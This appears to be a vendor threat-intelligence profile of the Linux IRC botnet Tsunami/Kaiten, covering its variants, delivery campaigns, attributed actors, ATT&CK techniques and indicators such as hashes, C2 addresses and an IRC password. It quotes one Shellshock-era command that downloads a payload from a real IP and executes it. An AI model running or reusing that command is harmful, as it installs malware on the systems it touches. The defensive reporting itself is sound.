Tsunami
Tsunami is a Linux malware family and IRC-controlled bot/backdoor widely associated with distributed denial-of-service (DDoS) activity and remote control of compromised systems. The content describes it as a Linux-based malware used primarily for DDoS attacks, with backdoor capabilities, and notes that it communicates over Internet Relay Chat (IRC) as its command-and-control channel. It has been referred to in detections and reporting as Tsunami/Kaiten, Kaiten, Keiten, and TsunamiKit in some contexts.
The malware has been observed on both IoT/embedded Linux devices and traditional Linux servers. Reporting in the content states that, unlike some IoT DDoS bots, Tsunami is distributed not only to IoT devices but also to Linux servers. It appears in multiple Linux intrusion chains involving brute-force attacks against SSH services, exploitation of public vulnerabilities, and post-exploitation payload deployment. Specific delivery contexts mentioned include Shellshock exploitation, Log4Shell-related botnet activity through the Muhstik variant, exploitation of Oracle WebLogic and Confluence vulnerabilities by the 8220 gang, and malicious VS Code repository/task abuse in the DPRK-linked Contagious Interview campaign where a Tsunami/TsunamiKit backdoor was deployed alongside XMRig.
Capabilities directly described in the content include IRC-based command reception, remote access/backdoor functionality, and DDoS attack execution. One Shellshock-delivered sample was an x86_64 ELF executable (MD5: aec2df8a6cb35aa5b01b0d9f1f879aa1) detected by many vendors as Tsunami/Kaiten; it functioned mainly as a DDoS client but also had backdoor capabilities and connected over IRC to 104.192.103.6. Another description states that a downloaded bashirc payload identified as Tsunami acted as a Linux backdoor allowing remote access while using IRC control as a client for DDoS attacks. In 8220-related activity, Tsunami payloads were identified by MD5 hashes 63a86932a5bad5da32ebd1689aa814b3 and 0ba9e6dcfc7451e386704b2846b7e440.
The content links Tsunami to several threat ecosystems and derivative malware. Remaiten was described as combining features of Tsunami and LizardStresser/Torlus. Muhstik was described as a Tsunami variant that borrows from Mirai code and, in one observed Log4j exploitation wave, added an ldm module that installed an SSH authorized_keys backdoor. SSHStalker was reported to use classic IRC botnet mechanics and to include known malware families such as Tsunami and Keiten in its toolkit. Rapper Bot’s alleged developer stated its code was derived from Mirai, Tsunami, and fBot. The China-linked 8220/Water Sigbin cryptomining operation used K4Spreader/Hadooken to deploy Tsunami together with mining payloads such as PwnRig/XMRig-derived miners.
Industries and victim environments mentioned in connection with Tsunami-related activity include cloud hosting environments, Linux SSH servers, routers and IoT devices, cryptocurrency/fintech/blockchain software engineers, and vulnerable enterprise applications such as WebLogic and Confluence servers. High-confidence indicators explicitly mentioned in the content include MD5 hashes aec2df8a6cb35aa5b01b0d9f1f879aa1, 63a86932a5bad5da32ebd1689aa814b3, and 0ba9e6dcfc7451e386704b2846b7e440; IRC/C2 infrastructure including 104.192.103.6, c4k-ircd.pwndns.pw, pwn.oracleservice.top, and 51.255.171.23; and one reported IRC configuration using channel #.br with password ircbot456@. ClamAV detections cited include Unix.Malware.Tsunami and Unix.Malware.Tsunami-9915807-0.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
6 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The downloaded payload (md5: aec2df8a6cb35aa5b01b0d9f1f879aa1) is an x86_64 ELF executable that was submitted to VirusTotal and detected by many vendors as Tsunami/Kaiten. It mainly functions as a DDoS client, but also has backdoor capabilities, communicating over IRC.
The downloaded payload (md5: aec2df8a6cb35aa5b01b0d9f1f879aa1) is an x86_64 ELF executable that was submitted to VirusTotal and detected by many vendors as Tsunami/Kaiten. It mainly functions as a DDoS client, but also has backdoor capabilities, communicating over IRC.
ClamAV signatures include "Unix.Malware.Tsunami" in the list of malware activity associated with ongoing exploitation campaigns.
"Tsunami, a Linux-based malware used primarily for Distributed Denial of Service (DDoS) attacks, is also a key component of both infection chains."
Currently, there are few samples and the following vulnerabilities are exploited. CVE_2020_14882
"Tsunami, a Linux-based malware used primarily for Distributed Denial of Service (DDoS) attacks, is also a key component of both infection chains."
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
“bi.64 -> Tsunami… Tsunami is a popular botnet that controls and communicates through the IRC protocol. Its main functions include remote control and DDoS attacks.”
“bi.64 -> Tsunami… Tsunami is a popular botnet that controls and communicates through the IRC protocol. Its main functions include remote control and DDoS attacks.”
Listed in several Lazarus/BeaverTail/InvisibleFerret related items as “tsunami,” including “Lazarus Tsunami InvisibleFerret.”
Techniques & procedures
7 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 technique“toolset blends… rootkit-class artifacts… PhoenixMiner… Linux.Cryptominer.Camelot… EnergyMech… Tsunami… Keiten… large back-catalog of Linux 2.6.x-era exploits”
Defense Impairment
1 techniqueThe injected BASH commands above download a file, change its permissions to read/write/execute for all users, and executes the file... chmod 777 /tmp/besh
Credential Access
1 technique“SSHStalker breaks into Linux servers via mass SSH scanning and brute force…”
Command and Control
2 techniquesThe command and control for Remaiten are handled by IRC communications. Additionally the command and control is done by an actual IRC channel rather than only the IRC protocol.
We have observed a number of injected BASH commands that attempt to download malware to vulnerable hosts... wget -O /tmp/besh http://104.192.103.6/bosh; chmod 777 /tmp/besh; /tmp/besh;
Impact
2 techniquesAuthorities claim they’ve gained control of Rapper Bot and stopped attacks emanating from what they described as “among the most powerful DDoS botnets to have ever existed.” ... Rapper Bot allegedly conducted more than 370,000 attacks... Officials said Rapper Bot regularly conducted DDoS attacks measured between two to three terabits per second, adding that Rapper Bot’s largest attack may have exceeded six terabits per second.
We have observed a significant amount of overtly malicious traffic leveraging BASH, including... DDoS... The idea here is to convert exploited Web servers into on-demand DDoS clients.
IOCs tracked for this family
6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
18 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A named malware family included in the report tags related to Linux SSH server threats.
Referenced as a Linux botnet family known for using altered UPX magic bytes in packed ELF32 binaries.
Referenced as a known Linux IRC bot family/toolkit component used within the SSHStalker ecosystem for IRC-based bot functionality.
Legacy IRC-controlled botnet malware referenced as part of the SSHStalker toolkit; samples/components were detected as “Win.Trojan.Tsunami-5” and include IRC bot behavior and DDoS-style routines.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.